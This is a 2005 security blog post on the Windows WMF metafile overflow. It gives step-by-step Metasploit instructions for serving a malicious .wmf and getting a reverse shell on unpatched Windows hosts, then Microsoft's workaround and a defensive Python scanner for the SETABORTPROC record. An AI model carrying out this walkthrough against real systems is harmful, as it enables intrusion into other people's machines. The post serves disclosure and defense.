Exploiting the Windows XP/2003 Picture and Fax Viewer Metafile Overflow Vulnerability

Nitesh Dhanjani

Dec. 29, 2005 07:50 AM

HD Moore has released a module for the Metasploit Framework targeting the "Windows XP/2003 Picture and Fax Viewer Metafile Overflow" vulnerability. Here is how easy it is to exploit now:

1) Download the latest Metasploit 2.x snapshot.
2) Run ./msfweb
3) Point your web browser to http://127.0.0.1:55555
4) Click on "Windows XP/2003 Picture and Fax Viewer Metafile Overflow".
5) Click on "Automatic - Windows XP / Windows 2003 (default)".
6) Select a payload, for example "win32_reverse". The exploit serves the malicious .wmf over HTTP (port 8080 by default), and a reverse payload makes the victim connect back to whatever port you configure for it, so the Metasploit host has to accept incoming connections on both. Either turn its firewall off or add rules for those two ports.
7) Click on "-Exploit-".
8) From an unpatched Windows XP or 2003 host (easy to find as of today, since there is no official patch for this vulnerability yet), use Internet Explorer to browse to http://[ip]:8080/anything.wmf, where [ip] is the IP address of the host running Metasploit. The file name does not matter as long as it ends in .wmf, so that Windows hands the image to the Picture and Fax Viewer.
9) Your Metasploit browser session should now show the session details:

[screenshot: msfweb output listing the new session]

10) Click on the "Session [number]" link, and you now have shell access to the Windows host, running with the privileges of the user who opened the image. Type in the cmd.exe command of your choice, for example "ipconfig" as in the screenshot below:

[screenshot: "ipconfig" output in the msfweb session window]

Let's hope an official patch is released soon! Meanwhile, apply the workaround from Microsoft's advisory and unregister the Windows Picture and Fax Viewer, so that Windows no longer opens .wmf files with it: on the Start menu, choose Run, type "regsvr32 -u %windir%\system32\shimgvw.dll", and then click OK. You need an administrator account to do this, and it only removes this one viewer as a handler; other applications that render WMF files through GDI themselves are not covered. Once a patch is installed, re-register the viewer with "regsvr32 %windir%\system32\shimgvw.dll".
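The Metasploit module, like the samples seen in the wild, triggers the flaw through a WMF META_ESCAPE record whose escape code is SETABORTPROC (9): GDI treats the record's data as the abort procedure to call. The scanner below is an added example, not code from this post, from Metasploit, or from Microsoft. It walks a metafile's record stream and flags that record, which is the check a mail gateway or proxy can apply while the shimgvw.dll workaround above is the only option on the desktop. It assumes only the public WMF layout (an optional 22-byte placeable header, an 18-byte standard header, records sized in 16-bit words); the sample files are constructed inside the block, and the escape payload is filler bytes, not code.

```python
"""Scan a Windows Metafile (WMF) for a META_ESCAPE record carrying the
SETABORTPROC escape, the record the Picture and Fax Viewer exploit uses to
make GDI call into attacker-supplied bytes.  Added example; not code from
the post, from Metasploit or from Microsoft.  The sample files built below
are constructed here, and the escape data is filler, not shellcode."""
import struct

PLACEABLE_KEY = 0x9AC6CDD7  # magic of the optional 22-byte placeable header
META_ESCAPE = 0x0626        # record function: META_ESCAPE
META_EOF = 0x0000           # record function: end of metafile
META_SETMAPMODE = 0x0103    # a harmless record, used in the benign sample
SETABORTPROC = 0x0009       # escape function code: SETABORTPROC


def scan_wmf(data: bytes) -> dict:
    """Walk the record stream in file order, the way GDI plays it back.
    Returns setabortproc (bool), records (int), malformed (bool) and
    findings (list of str).  A hit is reported even if the file turns out
    to be malformed later, because GDI executes records as it reads them."""
    result = {"setabortproc": False, "records": 0, "malformed": False, "findings": []}
    offset = 0
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        offset = 22  # skip the Aldus placeable header
    if len(data) < offset + 18:
        result["malformed"] = True
        result["findings"].append("truncated metafile header")
        return result
    # mtType, mtHeaderSize (words), mtVersion, mtSize (words), mtNoObjects,
    # mtMaxRecord (words), mtNoParameters
    _, header_words, _, _, _, _, _ = struct.unpack_from("<HHHIHIH", data, offset)
    offset += header_words * 2
    saw_eof = False
    while offset + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, offset)
        rec_len = size_words * 2
        if size_words < 3 or offset + rec_len > len(data):
            result["malformed"] = True
            result["findings"].append(f"record at {offset:#x}: bad rdSize {size_words} words")
            break
        result["records"] += 1
        if func == META_ESCAPE and rec_len >= 10:
            esc_func, byte_count = struct.unpack_from("<HH", data, offset + 6)
            if esc_func == SETABORTPROC:
                result["setabortproc"] = True
                result["findings"].append(
                    f"record at {offset:#x}: META_ESCAPE SETABORTPROC with {byte_count} data bytes")
        if func == META_EOF:
            saw_eof = True
            break
        offset += rec_len
    if not saw_eof and not result["malformed"]:
        result["malformed"] = True
        result["findings"].append("no META_EOF record before end of file")
    return result


def _record(func: int, params: bytes = b"") -> bytes:
    """Encode one WMF record: rdSize in 16-bit words, rdFunction, parameters."""
    assert len(params) % 2 == 0, "WMF records are word-aligned"
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params


def build_wmf(records: list, placeable: bool = False) -> bytes:
    """Wrap a list of encoded records in a standard header, optionally
    preceded by a placeable header (key, handle, bbox, dpi, reserved, XOR checksum)."""
    body = b"".join(records)
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, (18 + len(body)) // 2, 0,
                         max(len(r) for r in records) // 2, 0)
    prefix = b""
    if placeable:
        head = struct.pack("<IHhhhhHI", PLACEABLE_KEY, 0, 0, 0, 100, 100, 96, 0)
        checksum = 0
        for i in range(0, 20, 2):
            checksum ^= struct.unpack_from("<H", head, i)[0]
        prefix = head + struct.pack("<H", checksum)
    return prefix + header + body


# Constructed samples (not real files): a benign one-record drawing, a file
# carrying the SETABORTPROC escape with 16 filler bytes where an exploit
# would put code, and the same hostile record followed by a bogus rdSize.
BENIGN_WMF = build_wmf([_record(META_SETMAPMODE, struct.pack("<H", 8)),
                        _record(META_EOF)], placeable=True)
FILLER = b"\x90" * 16
HOSTILE_WMF = build_wmf([_record(META_ESCAPE, struct.pack("<HH", SETABORTPROC, len(FILLER)) + FILLER),
                         _record(META_EOF)])
MANGLED_WMF = HOSTILE_WMF[:-6] + struct.pack("<IH", 0xFFFFFFFF, 0)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_WMF), ("hostile", HOSTILE_WMF), ("mangled", MANGLED_WMF)):
        print(name, scan_wmf(blob))
```

Because GDI plays records back as it reads them, the scanner keeps the hit it already found rather than giving up when a later record is malformed; a scanner that only returns "unparseable" on the first bad record is trivially evaded. The check is by record content, not by file extension or by which application opens the file, so it covers paths the shimgvw.dll workaround does not.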

Nitesh Dhanjani is a well known security researcher, author, and speaker. Dhanjani has been invited to talk at various information security events such as the Black Hat Briefings, RSA, Hack in the Box, Microsoft Blue Hat, and OSCON.





This work is licensed under a Creative Commons License.
